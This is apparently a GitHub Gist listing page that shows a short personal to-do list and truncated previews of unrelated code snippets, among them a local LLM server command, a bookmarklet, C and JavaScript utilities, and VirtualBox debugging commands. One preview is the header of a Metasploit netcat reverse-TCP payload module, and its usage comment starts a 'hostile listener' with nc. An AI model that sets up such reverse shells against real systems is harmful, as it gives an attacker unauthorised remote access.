- figure out what is jev https://x.com/k_grajeda/status/2099952715430596710
- talk by diogo https://x.com/0xCodez/status/2100981133508817336
- use openjev to set my light on/off red/blue in 50ms
- contextual editing
- coding email rules
- https://x.com/southpolesteve/status/2100767781868150938
- do attn management on my own email feed first
- local mail rules
- https://x.com/southpolesteve/status/2100767781868150938
- local categorization
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| llama-server \ | |
| --alias qwen3.8-27b-nvfp4-mtp-q8attn \ | |
| -m "$HOME/.lmstudio/models/utautako/Qwen3.8-27B-NVFP4-MTP-Q8attn-GGUF/Qwen3.8-27B-NVFP4-MTP-Q8attn.gguf" \ | |
| --mmproj "$HOME/.lmstudio/models/utautako/Qwen3.8-27B-NVFP4-MTP-Q8attn-GGUF/mmproj-Qwen3.8-27B-NVFP4-BF16.gguf" \ | |
| --spec-type draft-mtp \ | |
| --spec-draft-n-max 4 \ | |
| -ngl 99 \ | |
| -c 262144 \ |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <!doctype html> | |
| <html> | |
| <head><meta charset="utf-8"><title>Grok to Markdown bookmarklet</title></head> | |
| <body> | |
| <h1>Grok → Markdown bookmarklet</h1> | |
| <p>Drag this link to your bookmarks bar (Zen browser), then click it on any grok.com chat:</p> | |
| <p><a id="bm" href="#">Grok→MD</a></p> | |
| <pre id="src"></pre> | |
| <script> | |
| const code = `(function(){try{ |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| // this is the ECS lib | |
| // Generational Index | |
| // assemble an entity id | |
| inline GID GI_eid(bool pair, CID gen, CID arch, CID arch_idx) { | |
| return // | |
| (pair ? PAIR_BIT : 0U) | // | |
| ((u32)gen << GEN_SHIFT) | // | |
| ((u32)arch << ARCH_SHIFT) | // |
VBoxManage controlvm "k8s-ctl3" pause
VBoxManage debugvm "k8s-ctl3" dumpvmcore --filename ~/k8s-ctl3-core.dump
user@FAFB09C2:~$ VBoxManage debugvm "k8s-ctl3" getregisters --cpu 0 rip
rip = 0xffffffff81ddde2b
user@FAFB09C2:~$ VBoxManage debugvm "k8s-ctl3" getregisters --cpu 1 rip
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #include <stdio.h> | |
| #include <stdlib.h> | |
| int do_something(const char *filename) { | |
| FILE *file = NULL; | |
| char *buffer = NULL; | |
| int result = -1; | |
| file = fopen(filename, "r"); | |
| if (!file) { |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| const promiseBatch = async function* (concurrency, list, fn) { | |
| for (let p = [], i = 0, l = list.length; i < l || p.length > 0;) { | |
| if (i < l) { | |
| let _p; | |
| _p = fn(list[i]).then(r => [_p.__id, r]); | |
| _p.__id = i++; | |
| if (p.push(_p) < concurrency) { | |
| continue; | |
| } | |
| } |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| ## | |
| # This module requires Metasploit: https://metasploit.com/download | |
| # Current source: https://github.com/rapid7/metasploit-framework | |
| ## | |
| # /usr/share/metasploit-framework/modules/payloads/singles/generic/nc_reverse_tcp.rb | |
| # usage: | |
| # # launch hostile listener | |
| # $ sudo nc -vlp 80 -ns 192.168.119.198 |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| (async () => { | |
| const orderedSet = ['6','7','8','9','10','V','D','K','T']; | |
| const nextAbove = c => | |
| orderedSet[orderedSet.indexOf(c) + 1]; | |
| let moveHistory = []; | |
| const analyze = (state) => { | |
| let moves = []; |
NewerOlder